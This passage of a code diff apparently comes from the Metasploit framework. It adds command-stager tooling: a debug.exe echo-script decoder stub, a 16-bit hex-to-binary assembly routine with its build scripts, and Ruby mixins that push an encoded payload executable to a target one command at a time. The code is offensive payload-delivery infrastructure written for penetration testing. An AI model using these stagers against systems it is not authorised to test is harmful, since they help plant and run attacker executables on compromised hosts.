+echo e e08 46 >>decoder_stub
+echo e e0a 69 >>decoder_stub
+echo e e0c 6c >>decoder_stub
+echo e e0e 65 >>decoder_stub
+echo e e10 49 >>decoder_stub
+echo e e12 6e >>decoder_stub
+echo e e14 66 >>decoder_stub
+echo e e16 6f >>decoder_stub
+echo e e1c 24 >>decoder_stub
+echo e e1e 04 >>decoder_stub
+echo e e22 54 >>decoder_stub
+echo e e24 72 >>decoder_stub
+echo e e26 61 >>decoder_stub
+echo e e28 6e >>decoder_stub
+echo e e2a 73 >>decoder_stub
+echo e e2c 6c >>decoder_stub
+echo e e2e 61 >>decoder_stub
+echo e e30 74 >>decoder_stub
+echo e e32 69 >>decoder_stub
+echo e e34 6f >>decoder_stub
+echo e e36 6e >>decoder_stub
+echo e e3e b0 04 >>decoder_stub
+echo e e41 02 >>decoder_stub
+echo e e44 01 >>decoder_stub
+echo e e46 53 >>decoder_stub
+echo e e48 74 >>decoder_stub
+echo e e4a 72 >>decoder_stub
+echo e e4c 69 >>decoder_stub
+echo e e4e 6e >>decoder_stub
+echo e e50 67 >>decoder_stub
+echo e e52 46 >>decoder_stub
+echo e e54 69 >>decoder_stub
+echo e e56 6c >>decoder_stub
+echo e e58 65 >>decoder_stub
+echo e e5a 49 >>decoder_stub
+echo e e5c 6e >>decoder_stub
+echo e e5e 66 >>decoder_stub
+echo e e60 6f >>decoder_stub
+echo e e64 dc 01 >>decoder_stub
+echo e e68 01 >>decoder_stub
+echo e e6a 30 >>decoder_stub
+echo e e6c 30 >>decoder_stub
+echo e e6e 30 >>decoder_stub
+echo e e70 30 >>decoder_stub
+echo e e72 30 >>decoder_stub
+echo e e74 34 >>decoder_stub
+echo e e76 62 >>decoder_stub
+echo e e78 30 >>decoder_stub
+echo e e7c 38 >>decoder_stub
+echo e e7e 08 >>decoder_stub
+echo e e80 01 >>decoder_stub
+echo e e82 46 >>decoder_stub
+echo e e84 69 >>decoder_stub
+echo e e86 6c >>decoder_stub
+echo e e88 65 >>decoder_stub
+echo e e8a 44 >>decoder_stub
+echo e e8c 65 >>decoder_stub
+echo e e8e 73 >>decoder_stub
+echo e e90 63 >>decoder_stub
+echo e e92 72 >>decoder_stub
+echo e e94 69 >>decoder_stub
+echo e e96 70 >>decoder_stub
+echo e e98 74 >>decoder_stub
+echo e e9a 69 >>decoder_stub
+echo e e9c 6f >>decoder_stub
+echo e e9e 6e >>decoder_stub
+echo e ea4 68 >>decoder_stub
+echo e ea6 65 >>decoder_stub
+echo e ea8 78 >>decoder_stub
+echo e eaa 32 >>decoder_stub
+echo e eac 62 >>decoder_stub
+echo e eae 69 >>decoder_stub
+echo e eb0 6e >>decoder_stub
+echo e eb4 30 >>decoder_stub
+echo e eb6 08 >>decoder_stub
+echo e eb8 01 >>decoder_stub
+echo e eba 46 >>decoder_stub
+echo e ebc 69 >>decoder_stub
+echo e ebe 6c >>decoder_stub
+echo e ec0 65 >>decoder_stub
+echo e ec2 56 >>decoder_stub
+echo e ec4 65 >>decoder_stub
+echo e ec6 72 >>decoder_stub
+echo e ec8 73 >>decoder_stub
+echo e eca 69 >>decoder_stub
+echo e ecc 6f >>decoder_stub
+echo e ece 6e >>decoder_stub
+echo e ed4 31 >>decoder_stub
+echo e ed6 2e >>decoder_stub
+echo e ed8 30 >>decoder_stub
+echo e eda 2e >>decoder_stub
+echo e edc 30 >>decoder_stub
+echo e ede 2e >>decoder_stub
+echo e ee0 30 >>decoder_stub
+echo e ee4 38 >>decoder_stub
+echo e ee6 0c >>decoder_stub
+echo e ee8 01 >>decoder_stub
+echo e eea 49 >>decoder_stub
+echo e eec 6e >>decoder_stub
+echo e eee 74 >>decoder_stub
+echo e ef0 65 >>decoder_stub
+echo e ef2 72 >>decoder_stub
+echo e ef4 6e >>decoder_stub
+echo e ef6 61 >>decoder_stub
+echo e ef8 6c >>decoder_stub
+echo e efa 4e >>decoder_stub
+echo e efc 61 >>decoder_stub
+echo e efe 6d >>decoder_stub
+echo e f00 65 >>decoder_stub
+echo e f04 68 >>decoder_stub
+echo e f06 65 >>decoder_stub
+echo e f08 78 >>decoder_stub
+echo e f0a 32 >>decoder_stub
+echo e f0c 62 >>decoder_stub
+echo e f0e 69 >>decoder_stub
+echo e f10 6e >>decoder_stub
+echo e f12 2e >>decoder_stub
+echo e f14 65 >>decoder_stub
+echo e f16 78 >>decoder_stub
+echo e f18 65 >>decoder_stub
+echo e f1c 48 >>decoder_stub
+echo e f1e 12 >>decoder_stub
+echo e f20 01 >>decoder_stub
+echo e f22 4c >>decoder_stub
+echo e f24 65 >>decoder_stub
+echo e f26 67 >>decoder_stub
+echo e f28 61 >>decoder_stub
+echo e f2a 6c >>decoder_stub
+echo e f2c 43 >>decoder_stub
+echo e f2e 6f >>decoder_stub
+echo e f30 70 >>decoder_stub
+echo e f32 79 >>decoder_stub
+echo e f34 72 >>decoder_stub
+echo e f36 69 >>decoder_stub
+echo e f38 67 >>decoder_stub
+echo e f3a 68 >>decoder_stub
+echo e f3c 74 >>decoder_stub
+echo e f40 43 >>decoder_stub
+echo e f42 6f >>decoder_stub
+echo e f44 70 >>decoder_stub
+echo e f46 79 >>decoder_stub
+echo e f48 72 >>decoder_stub
+echo e f4a 69 >>decoder_stub
+echo e f4c 67 >>decoder_stub
+echo e f4e 68 >>decoder_stub
+echo e f50 74 >>decoder_stub
+echo e f52 20 >>decoder_stub
+echo e f54 a9 >>decoder_stub
+echo e f56 20 >>decoder_stub
+echo e f58 20 >>decoder_stub
+echo e f5a 32 >>decoder_stub
+echo e f5c 30 >>decoder_stub
+echo e f5e 30 >>decoder_stub
+echo e f60 38 >>decoder_stub
+echo e f64 40 >>decoder_stub
+echo e f66 0c >>decoder_stub
+echo e f68 01 >>decoder_stub
+echo e f6a 4f >>decoder_stub
+echo e f6c 72 >>decoder_stub
+echo e f6e 69 >>decoder_stub
+echo e f70 67 >>decoder_stub
+echo e f72 69 >>decoder_stub
+echo e f74 6e >>decoder_stub
+echo e f76 61 >>decoder_stub
+echo e f78 6c >>decoder_stub
+echo e f7a 46 >>decoder_stub
+echo e f7c 69 >>decoder_stub
+echo e f7e 6c >>decoder_stub
+echo e f80 65 >>decoder_stub
+echo e f82 6e >>decoder_stub
+echo e f84 61 >>decoder_stub
+echo e f86 6d >>decoder_stub
+echo e f88 65 >>decoder_stub
+echo e f8c 68 >>decoder_stub
+echo e f8e 65 >>decoder_stub
+echo e f90 78 >>decoder_stub
+echo e f92 32 >>decoder_stub
+echo e f94 62 >>decoder_stub
+echo e f96 69 >>decoder_stub
+echo e f98 6e >>decoder_stub
+echo e f9a 2e >>decoder_stub
+echo e f9c 65 >>decoder_stub
+echo e f9e 78 >>decoder_stub
+echo e fa0 65 >>decoder_stub
+echo e fa4 30 >>decoder_stub
+echo e fa6 08 >>decoder_stub
+echo e fa8 01 >>decoder_stub
+echo e faa 50 >>decoder_stub
+echo e fac 72 >>decoder_stub
+echo e fae 6f >>decoder_stub
+echo e fb0 64 >>decoder_stub
+echo e fb2 75 >>decoder_stub
+echo e fb4 63 >>decoder_stub
+echo e fb6 74 >>decoder_stub
+echo e fb8 4e >>decoder_stub
+echo e fba 61 >>decoder_stub
+echo e fbc 6d >>decoder_stub
+echo e fbe 65 >>decoder_stub
+echo e fc4 68 >>decoder_stub
+echo e fc6 65 >>decoder_stub
+echo e fc8 78 >>decoder_stub
+echo e fca 32 >>decoder_stub
+echo e fcc 62 >>decoder_stub
+echo e fce 69 >>decoder_stub
+echo e fd0 6e >>decoder_stub
+echo e fd4 34 >>decoder_stub
+echo e fd6 08 >>decoder_stub
+echo e fd8 01 >>decoder_stub
+echo e fda 50 >>decoder_stub
+echo e fdc 72 >>decoder_stub
+echo e fde 6f >>decoder_stub
+echo e fe0 64 >>decoder_stub
+echo e fe2 75 >>decoder_stub
+echo e fe4 63 >>decoder_stub
+echo e fe6 74 >>decoder_stub
+echo e fe8 56 >>decoder_stub
+echo e fea 65 >>decoder_stub
+echo e fec 72 >>decoder_stub
+echo e fee 73 >>decoder_stub
+echo e ff0 69 >>decoder_stub
+echo e ff2 6f >>decoder_stub
+echo e ff4 6e >>decoder_stub
+echo e ff8 31 >>decoder_stub
+echo e ffa 2e >>decoder_stub
+echo e ffc 30 >>decoder_stub
+echo e ffe 2e >>decoder_stub
+echo e 1000 30 >>decoder_stub
+echo e 1002 2e >>decoder_stub
+echo e 1004 30 >>decoder_stub
+echo e 1008 38 >>decoder_stub
+echo e 100a 08 >>decoder_stub
+echo e 100c 01 >>decoder_stub
+echo e 100e 41 >>decoder_stub
+echo e 1010 73 >>decoder_stub
+echo e 1012 73 >>decoder_stub
+echo e 1014 65 >>decoder_stub
+echo e 1016 6d >>decoder_stub
+echo e 1018 62 >>decoder_stub
+echo e 101a 6c >>decoder_stub
+echo e 101c 79 >>decoder_stub
+echo e 101e 20 >>decoder_stub
+echo e 1020 56 >>decoder_stub
+echo e 1022 65 >>decoder_stub
+echo e 1024 72 >>decoder_stub
+echo e 1026 73 >>decoder_stub
+echo e 1028 69 >>decoder_stub
+echo e 102a 6f >>decoder_stub
+echo e 102c 6e >>decoder_stub
+echo e 1030 31 >>decoder_stub
+echo e 1032 2e >>decoder_stub
+echo e 1034 30 >>decoder_stub
+echo e 1036 2e >>decoder_stub
+echo e 1038 30 >>decoder_stub
+echo e 103a 2e >>decoder_stub
+echo e 103c 30 >>decoder_stub
+echo e 1040 ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e >>decoder_stub
+echo e 1054 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 >>decoder_stub
+echo e 1068 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 79 65 73 22 3f 3e 0d 0a >>decoder_stub
+echo e 107c 3c 61 73 73 65 6d 62 6c 79 20 78 6d 6c 6e 73 3d 22 75 72 6e >>decoder_stub
+echo e 1090 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 >>decoder_stub
+echo e 10a4 6f 6d 3a 61 73 6d 2e 76 31 22 20 6d 61 6e 69 66 65 73 74 56 >>decoder_stub
+echo e 10b8 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 0d 0a 20 20 3c 61 73 >>decoder_stub
+echo e 10cc 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 76 65 72 73 69 >>decoder_stub
+echo e 10e0 6f 6e 3d 22 31 2e 30 2e 30 2e 30 22 20 6e 61 6d 65 3d 22 4d >>decoder_stub
+echo e 10f4 79 41 70 70 6c 69 63 61 74 69 6f 6e 2e 61 70 70 22 2f 3e 0d >>decoder_stub
+echo e 1108 0a 20 20 3c 74 72 75 73 74 49 6e 66 6f 20 78 6d 6c 6e 73 3d >>decoder_stub
+echo e 111c 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f >>decoder_stub
+echo e 1130 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 3e 0d 0a 20 20 20 >>decoder_stub
+echo e 1144 20 3c 73 65 63 75 72 69 74 79 3e 0d 0a 20 20 20 20 20 20 3c >>decoder_stub
+echo e 1158 72 65 71 75 65 73 74 65 64 50 72 69 76 69 6c 65 67 65 73 20 >>decoder_stub
+echo e 116c 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d >>decoder_stub
+echo e 1180 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 33 22 >>decoder_stub
+echo e 1194 3e 0d 0a 20 20 20 20 20 20 20 20 3c 72 65 71 75 65 73 74 65 >>decoder_stub
+echo e 11a8 64 45 78 65 63 75 74 69 6f 6e 4c 65 76 65 6c 20 6c 65 76 65 >>decoder_stub
+echo e 11bc 6c 3d 22 61 73 49 6e 76 6f 6b 65 72 22 20 75 69 41 63 63 65 >>decoder_stub
+echo e 11d0 73 73 3d 22 66 61 6c 73 65 22 2f 3e 0d 0a 20 20 20 20 20 20 >>decoder_stub
+echo e 11e4 3c 2f 72 65 71 75 65 73 74 65 64 50 72 69 76 69 6c 65 67 65 >>decoder_stub
+echo e 11f8 73 3e 0d 0a 20 20 20 20 3c 2f 73 65 63 75 72 69 74 79 3e 0d >>decoder_stub
+echo e 120c 0a 20 20 3c 2f 74 72 75 73 74 49 6e 66 6f 3e 0d 0a 3c 2f 61 >>decoder_stub
+echo e 1220 73 73 65 6d 62 6c 79 3e 0d 0a >>decoder_stub
+echo e 1301 20 >>decoder_stub
+echo e 1304 0c >>decoder_stub
+echo e 1308 c0 38 >>decoder_stub
+echo w >>decoder_stub
+echo q >>decoder_stub
--- a/data/exploits/cmdstager/decoder_stub
+++ b/data/exploits/cmdstager/decoder_stub
--- a/external/source/cmdstager/debug_asm/Makefile
+++ b/external/source/cmdstager/debug_asm/Makefile
@ -0,0 +1,22 @@
+all: h2b_stub
+
+h2b_stub: h2b_asm
+	cat h2b_asm | \
+		sed 's/^/echo /g' | \
+		sed 's/$$/ >>decoder_stub/g' | \
+		sed 's/echo  /echo  /g'> h2b_stub
+
+h2b_asm: h2b.com.dbg
+	cat h2b.com.dbg | \
+		sed 's/\;.*$$//g' | \
+		grep -v ^''$$ | \
+		tr -d '\r' | \
+		sed 's/ *$$//g' > h2b_asm
+
+h2b.com.dbg:
+	./fix_up.rb > h2b.com.dbg
+	unix2dos h2b.com.dbg
+	chmod 644 h2b.com.dbg
+
+clean:
+	rm -f h2b.com.dbg h2b_asm h2b_stub
--- a/external/source/cmdstager/debug_asm/fix_up.rb
+++ b/external/source/cmdstager/debug_asm/fix_up.rb
@ -0,0 +1,82 @@
+#!/usr/bin/env ruby
+#
+# fix up the assembly based on the debug.exe transcript
+#
+# Joshua J. Drake
+#
+
+dtrans = nil
+File.open("woop.txt", "rb") { |fd|
+	dtrans = fd.read(fd.stat.size)
+}
+
+asm = nil
+File.open("h2b.com.dbg.in", "rb") { |fd|
+	asm = fd.read(fd.stat.size)
+}
+
+
+# extract label addresses
+addrs = {}
+dtrans.each_line { |ln|
+	if ln =~ /;[^ ].*:/
+		parts = ln.split(' ')
+		label = parts[1]
+		label = label.slice(1,label.index(':')-1)
+		addr = parts[0].split(':')[1].to_i(16)
+		#puts "%s => %x" % [label, addr]
+		one = { label => addr }
+		addrs.merge!(one)
+	end
+}
+#puts addrs.inspect
+
+
+# replace calls, jmps, and read/write handle/filename references
+replaces = []
+asm.each_line { |ln|
+	if ln =~ /call /
+		parts = ln.split(' ')
+		if (parts[0] == "call" and parts[2] == ";call")
+			old = parts[1]
+			func = parts[3]
+			new = addrs[func]
+			#puts "%32s: %s -> %x" % [func, old, new]
+			replaces << [func, old, new.to_s(16)]
+		end
+	end
+
+	if ln =~ /\(jmp\)/
+		parts = ln.split(' ')
+		if (parts[0][0,1] == "j" and parts[2][0,2] == ";j" and parts[4] == "(jmp)")
+			old = parts[1]
+			func = parts[3]
+			new = addrs[func]
+			#puts "%32s: %s -> %x" % [func, old, new]
+			replaces << [func, old, new.to_s(16)]
+		end
+	end
+
+	if ln =~ /;(read|write)_(handle|filename)=/
+		parts = ln.split(' ')
+		if (parts[0] == "mov")
+			parts2 = parts[2].split('=')
+			label = parts2[0]
+			label.slice!(0,1)
+			old = parts2[1]
+			new = addrs[label]
+			#puts "%32s: %s -> %x" % [label, old, new]
+			replaces << [label, old, new.to_s(16)]
+		end
+	end
+}
+
+
+# replace the stuff
+replaces.uniq!
+replaces.each { |arr|
+	#puts "%32s: %s -> %s" % arr
+	asm.gsub!(arr[1], arr[2])
+}
+
+print asm
--- a/external/source/cmdstager/debug_asm/h2b.com.dbg.in
+++ b/external/source/cmdstager/debug_asm/h2b.com.dbg.in
@ -0,0 +1,165 @@
+a 0100
+;-----------------------------------------------
+; Hex to Binary 16-bit ASM in debug.com syntax.
+; v0.2
+;
+; Joshua J. Drake <jduck [at] metasploit.com>
+;
+; References:
+; http://kipirvine.com/asm/debug/Debug_Tutorial.pdf
+; http://jakash3.wordpress.com/2010/02/20/file-operations-in-assembly-language/
+;-----------------------------------------------
+;
+jmp 999       ;jmp main (jmp)
+;
+;exit_program:
+; close read file
+mov bx,[1a9]  ;read_handle=1a9
+call 998      ;call close_file
+; close write file
+mov bx,[1b8]  ;write_handle=1b8
+call 998      ;call close_file
+mov ax,4c00   ;Exit function (AL=Errorlevel to return)
+int 21        ;Do it
+;
+;open_for_reading:
+mov ah,3d     ;Open file function
+mov al,00     ;Read-Only file access
+mov dx,1ab    ;read_filename=1ab
+int 21        ;Do it
+mov [1a9],ax  ;read_handle=1a9
+ret
+;
+;open_for_writing:
+mov ah,3c     ;Open file function
+mov cx,4      ;Archive file attribute
+mov dx,1ba    ;write_filename=1ba
+int 21        ;Do it
+mov [1b8],ax  ;write_handle=1b8
+ret
+;
+;close_file:
+mov ax,3e00   ;Close file function
+int 21
+ret
+;
+; read(*phR,0x200,0x100)
+;read_data:
+mov bx,[1a9]  ;read_handle=1a9
+mov ax,3f00   ;Read from file function
+mov cx,100    ;Read the first 256 bytes of file
+mov dx,0200   ;Address of buffer to store bytes read
+int 21        ;Do it
+cmp ax,2      ;must have at least 2 bytes to continue
+ja 988        ;ja have_enough (jmp)
+call 997      ;call write_data
+call 996      ;call exit_program
+;have_enough:
+ret
+;
+;convert_to_nibble: (al)
+mov ah,0      ;no error
+or al,20      ;lowercase the byte
+sub al,30     ;is it in the 0-9 range?
+cmp al,9
+jbe 987       ;jbe convert_success (jmp)
+sub al,31     ;if not, is it in the 0x61-0x66 range?
+cmp al,5
+ja 986        ;ja convert_error (jmp)
+add al,a      ;yep, converted -> add 10 and return it
+;convert_success:
+ret
+;convert_error:
+mov ah,ff     ;return error
+ret
+;
+;get_one_byte:
+cmp bp,0      ;see if we have bytes left
+jne 985       ;jne return_byte (jmp)
+call 995      ;call read_data
+mov bp,ax     ;store bytes read in bp
+mov si,200    ;reset src ptr
+;return_byte:
+lodsb
+dec bp
+ret
+;
+; write(*phW,0x300,di-0x300)
+;write_data:
+mov cx,di     ;load dst ptr
+sub cx,300    ;convert to count
+mov bx,[1b8]  ;write_handle=1b8
+mov ax,4000   ;Write to File function
+mov dx,0300   ;Points to data to write
+int 21        ;Do it
+ret
+;
+;get_nibble_or_die_trying:
+call 994      ;call get_one_byte
+call 993      ;call convert_to_nibble
+cmp ah,0      ;check for error
+jne 990       ;jne get_nibble_or_die_trying (jmp)
+ret
+;
+;
+;================================================================
+;
+;------
+;main:
+;------
+;
+call 992      ;call open_for_reading
+call 991      ;call open_for_writing
+;
+;-----------------------------------------------
+; loop, processing bytes, refilling when needed
+;-----------------------------------------------
+;
+; init pre-loop
+mov bp,0      ;bytes left
+;outer_loop:
+mov di,300    ;write buf
+;inner_loop:
+;
+; load the first byte (high nibble)
+call 990      ;call get_nibble_or_die_trying
+;
+; save the nibble in ah -> stack
+mov cx,1000
+mul cx
+push ax
+;
+; load the second byte (low nibble)
+call 990      ;call get_nibble_or_die_trying
+;
+; combine the nibbles and save the result
+pop dx
+or al,dh
+stosb
+;
+; if we're not done, process the next byte
+cmp bp, 0
+jne 984       ;jne inner_loop (jmp)
+;
+;
+; flush output and try for more
+call 989      ;call write_data
+jmp 983       ;jmp outer_loop (jmp)
+;
+; declare global data
+;read_handle:
+db 00,00
+;read_filename:
+db "testfile.dat",00
+;write_handle:
+db 00,00
+;write_filename:
+db "testfile.out",00
+;
+; remainder is buffer space
+
+r cx
+0400
+n h2b.com
+w
+q
--- a/external/source/cmdstager/debug_asm/woop.txt
+++ b/external/source/cmdstager/debug_asm/woop.txt
@ -0,0 +1,167 @@
+-a 0100
+0AE4:0100 ;-----------------------------------------------
+0AE4:0100 ; Hex to Binary 16-bit ASM in debug.com syntax.
+0AE4:0100 ; v0.2
+0AE4:0100 ;
+0AE4:0100 ; Joshua J. Drake <jduck [at] metasploit.com>
+0AE4:0100 ;
+0AE4:0100 ; References:
+0AE4:0100 ; http://kipirvine.com/asm/debug/Debug_Tutorial.pdf
+0AE4:0100 ; http://jakash3.wordpress.com/2010/02/20/file-operations-in-assembly-language/
+0AE4:0100 ;-----------------------------------------------
+0AE4:0100 ;
+0AE4:0100 jmp 197       ;jmp main (jmp)
+0AE4:0103 ;
+0AE4:0103 ;exit_program:
+0AE4:0103 ; close read file
+0AE4:0103 mov bx,[1bd]  ;read_handle=1bd
+0AE4:0107 call 131      ;call close_file
+0AE4:010A ; close write file
+0AE4:010A mov bx,[1cc]  ;write_handle=1cc
+0AE4:010E call 131      ;call close_file
+0AE4:0111 mov ax,4c00   ;Exit function (AL=Errorlevel to return)
+0AE4:0114 int 21        ;Do it
+0AE4:0116 ;
+0AE4:0116 ;open_for_reading:
+0AE4:0116 mov ah,3d     ;Open file function
+0AE4:0118 mov al,00     ;Read-Only file access
+0AE4:011A mov dx,1bf    ;read_filename=1bf
+0AE4:011D int 21        ;Do it
+0AE4:011F mov [1bd],ax  ;read_handle=1bd
+0AE4:0122 ret
+0AE4:0123 ;
+0AE4:0123 ;open_for_writing:
+0AE4:0123 mov ah,3c     ;Open file function
+0AE4:0125 mov cx,4      ;Archive file attribute
+0AE4:0128 mov dx,1ce    ;write_filename=1ce
+0AE4:012B int 21        ;Do it
+0AE4:012D mov [1cc],ax  ;write_handle=1cc
+0AE4:0130 ret
+0AE4:0131 ;
+0AE4:0131 ;close_file:
+0AE4:0131 mov ax,3e00   ;Close file function
+0AE4:0134 int 21
+0AE4:0136 ret
+0AE4:0137 ;
+0AE4:0137 ; read(*phR,0x200,0x100)
+0AE4:0137 ;read_data:
+0AE4:0137 mov bx,[1bd]  ;read_handle=1bd
+0AE4:013B mov ax,3f00   ;Read from file function
+0AE4:013E mov cx,100    ;Read the first 256 bytes of file
+0AE4:0141 mov dx,0200   ;Address of buffer to store bytes read
+0AE4:0144 int 21        ;Do it
+0AE4:0146 cmp ax,2      ;must have at least 2 bytes to continue
+0AE4:0149 ja 151        ;ja have_enough (jmp)
+0AE4:014B call 178      ;call write_data
+0AE4:014E call 103      ;call exit_program
+0AE4:0151 ;have_enough:
+0AE4:0151 ret
+0AE4:0152 ;
+0AE4:0152 ;convert_to_nibble: (al)
+0AE4:0152 mov ah,0      ;no error
+0AE4:0154 or al,20      ;lowercase the byte
+0AE4:0156 sub al,30     ;is it in the 0-9 range?
+0AE4:0158 cmp al,9
+0AE4:015A jbe 164       ;jbe convert_success (jmp)
+0AE4:015C sub al,31     ;if not, is it in the 0x61-0x66 range?
+0AE4:015E cmp al,5
+0AE4:0160 ja 165        ;ja convert_error (jmp)
+0AE4:0162 add al,a      ;yep, converted -> add 10 and return it
+0AE4:0164 ;convert_success:
+0AE4:0164 ret
+0AE4:0165 ;convert_error:
+0AE4:0165 mov ah,ff     ;return error
+0AE4:0167 ret
+0AE4:0168 ;
+0AE4:0168 ;get_one_byte:
+0AE4:0168 cmp bp,0      ;see if we have bytes left
+0AE4:016B jne 175       ;jne return_byte (jmp)
+0AE4:016D call 137      ;call read_data
+0AE4:0170 mov bp,ax     ;store bytes read in bp
+0AE4:0172 mov si,200    ;reset src ptr
+0AE4:0175 ;return_byte:
+0AE4:0175 lodsb
+0AE4:0176 dec bp
+0AE4:0177 ret
+0AE4:0178 ;
+0AE4:0178 ; write(*phW,0x300,di-0x300)
+0AE4:0178 ;write_data:
+0AE4:0178 mov cx,di     ;load dst ptr
+0AE4:017A sub cx,300    ;convert to count
+0AE4:017E mov bx,[1cc]  ;write_handle=1cc
+0AE4:0182 mov ax,4000   ;Write to File function
+0AE4:0185 mov dx,0300   ;Points to data to write
+0AE4:0188 int 21        ;Do it
+0AE4:018A ret
+0AE4:018B ;
+0AE4:018B ;get_nibble_or_die_trying:
+0AE4:018B call 168      ;call get_one_byte
+0AE4:018E call 152      ;call convert_to_nibble
+0AE4:0191 cmp ah,0      ;check for error
+0AE4:0194 jne 18b       ;jne get_nibble_or_die_trying (jmp)
+0AE4:0196 ret
+0AE4:0197 ;
+0AE4:0197 ;
+0AE4:0197 ;================================================================
+0AE4:0197 ;
+0AE4:0197 ;------
+0AE4:0197 ;main:
+0AE4:0197 ;------
+0AE4:0197 ;
+0AE4:0197 call 116      ;call open_for_reading
+0AE4:019A call 123      ;call open_for_writing
+0AE4:019D ;
+0AE4:019D ;-----------------------------------------------
+0AE4:019D ; loop, processing bytes, refilling when needed
+0AE4:019D ;-----------------------------------------------
+0AE4:019D ;
+0AE4:019D ; init pre-loop
+0AE4:019D mov bp,0      ;bytes left
+0AE4:01A0 ;outer_loop:
+0AE4:01A0 mov di,300    ;write buf
+0AE4:01A3 ;inner_loop:
+0AE4:01A3 ;
+0AE4:01A3 ; load the first byte (high nibble)
+0AE4:01A3 call 18b      ;call get_nibble_or_die_trying
+0AE4:01A6 ;
+0AE4:01A6 ; save the nibble in ah -> stack
+0AE4:01A6 mov cx,1000
+0AE4:01A9 mul cx
+0AE4:01AB push ax
+0AE4:01AC ;
+0AE4:01AC ; load the second byte (low nibble)
+0AE4:01AC call 18b      ;call get_nibble_or_die_trying
+0AE4:01AF ;
+0AE4:01AF ; combine the nibbles and save the result
+0AE4:01AF pop dx
+0AE4:01B0 or al,dh
+0AE4:01B2 stosb
+0AE4:01B3 ;
+0AE4:01B3 ; if we're not done, process the next byte
+0AE4:01B3 cmp bp, 0
+0AE4:01B6 jne 1a3       ;jne inner_loop (jmp)
+0AE4:01B8 ;
+0AE4:01B8 ;
+0AE4:01B8 ; flush output and try for more
+0AE4:01B8 call 178      ;call write_data
+0AE4:01BB jmp 1a0       ;jmp outer_loop (jmp)
+0AE4:01BD ;
+0AE4:01BD ; declare global data
+0AE4:01BD ;read_handle:
+0AE4:01BD db 00,00
+0AE4:01BF ;read_filename:
+0AE4:01BF db "testfile.dat",00
+0AE4:01CC ;write_handle:
+0AE4:01CC db 00,00
+0AE4:01CE ;write_filename:
+0AE4:01CE db "testfile.out",00
+0AE4:01DB ;
+0AE4:01DB ; remainder is buffer space
+0AE4:01DB 
+-r cx
+CX 0000
+:0400
+-n h2b.com
+-w
+Writing 00400 bytes
+-q
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@ -1,14 +1,21 @@
+##
+# $Id$
+##
+
 require 'rex/exploitation/cmdstager'
+require 'msf/core/exploit/exe'

 module Msf

 ###
 #
-# This mixin provides a interface to generating cmdstagers
+# This mixin provides an interface to generating cmdstagers
 #
 ###
 module Exploit::CmdStager

+	include Msf::Exploit::EXE
+
 	#
 	# Creates an instance of an exploit that uses an CmdStager overwrite.
 	#
@ -18,23 +25,47 @@ module Exploit::CmdStager
 	end


+	#
+	# Execute the command stager while showing the progress
+	#
+	def execute_cmdstager(opts = {})
+		cmd_list = generate_cmdstager(opts)
+
+		execute_cmdstager_begin(opts)
+
+		sent = 0
+		total_bytes = 0
+		cmd_list.each { |cmd| total_bytes += cmd.length }
+
+		delay = opts[:delay]
+		delay ||= 0.25
+
+		cmd_list.each do |cmd|
+			execute_command(cmd, opts)
+			sent += cmd.length
+
+			# In cases where a server has multiple threads, we want to be sure that
+			# commands we execute happen in the correct (serial) order.
+			::IO.select(nil, nil, nil, delay)
+
+			progress(total_bytes, sent)
+		end
+
+		execute_cmdstager_end(opts)
+	end
+
+
 	#
 	# Generates a cmd stub based on the current target's architecture
 	# and operating system.
 	#
-	def generate_cmdstager(opts = {}, linelen=2047, pl=nil)
-		# Prefer the target's platform/architecture information, but use
-		# the module's if no target specific information exists
-		los   = target_platform
-		larch = target_arch || ARCH_X86
-		pl ||= payload
+	def generate_cmdstager(opts = {}, pl = nil)
+		pl ||= payload.encoded

-		if los.nil?
-			raise RuntimeError, "No platform restrictions were specified -- cannot generate cmdstager"
-		end
+		@exe = generate_exe

-		cmdstager = Rex::Exploitation::CmdStager.new(pl.encoded, framework, los, larch)
-		cmd_list = cmdstager.generate(opts, linelen)
+		stager_instance = create_stager(@exe)
+		cmd_list = stager_instance.generate(opts)

 		if (cmd_list.nil? or cmd_list.length < 1)
 			print_error("The command stager could not be generated")
@ -50,9 +81,16 @@ module Exploit::CmdStager
 	#
 	def progress(total, sent)
 		done = (sent.to_f / total.to_f) * 100
-		if (done.to_f < 99.00)
-			print_status("Command Stager progress - %3.2f%% done (%d/%d bytes)" % [done.to_f, sent, total])
-		end
+		percent = "%3.2f%%" % done.to_f
+		print_status("Command Stager progress - %6s done (%d/%d bytes)" % [percent, sent, total])
+	end
+
+	#
+	# Methods to override - not used internally
+	#
+	def execute_cmdstager_begin(opts)
+	end
+	def execute_cmdstager_end(opts)
 	end

 end
--- a/lib/msf/core/exploit/cmdstager_debug_asm.rb
+++ b/lib/msf/core/exploit/cmdstager_debug_asm.rb
@ -0,0 +1,39 @@
+##
+# $Id$
+##
+
+require 'msf/core/exploit/cmdstager'
+
+module Msf
+
+###
+#
+# This mixin provides an interface for staging cmd to arbitrary payloads
+#
+###
+module Exploit::CmdStagerDebugAsm
+
+	include Msf::Exploit::CmdStager
+
+	def initialize(info = {})
+		super
+
+		register_advanced_options(
+			[
+				OptString.new( 'DECODERSTUB',  [ true, 'The debug.exe assembly listing decoder stub to use.',
+					File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_asm")]),
+			], self.class)
+	end
+
+	def create_stager(exe)
+		Rex::Exploitation::CmdStagerDebugAsm.new(exe)
+	end
+
+	def execute_cmdstager(opts = {})
+		opts.merge!({ :decoder => datastore['DECODERSTUB'] })
+		super
+	end
+
+end
+
+end
--- a/lib/msf/core/exploit/cmdstager_debug_write.rb
+++ b/lib/msf/core/exploit/cmdstager_debug_write.rb
@ -0,0 +1,39 @@
+##
+# $Id$
+##
+
+require 'msf/core/exploit/cmdstager'
+
+module Msf
+
+###
+#
